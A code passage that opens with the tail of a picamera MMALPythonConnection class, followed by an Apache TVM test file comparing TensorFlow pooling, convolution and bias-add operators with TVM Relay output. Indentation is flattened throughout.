connections between Python and and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
|
test_forward.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.asnumpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].asnumpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
""" Generic function to compile on relay and execute on tvm """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
""" Generic function to execute tensorflow """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
# since the names from tensorflow and relay runs are not exactly same,
# first len(tf_output) will be compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
""" One iteration of pool operation with given shapes and attributes """
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
""" Pooling with dynamic height and width dimensions. """
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
""" Pooling """
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution transpose with given shapes and attributes """
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
""" One iteration of biasadd with given shapes and attributes """
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
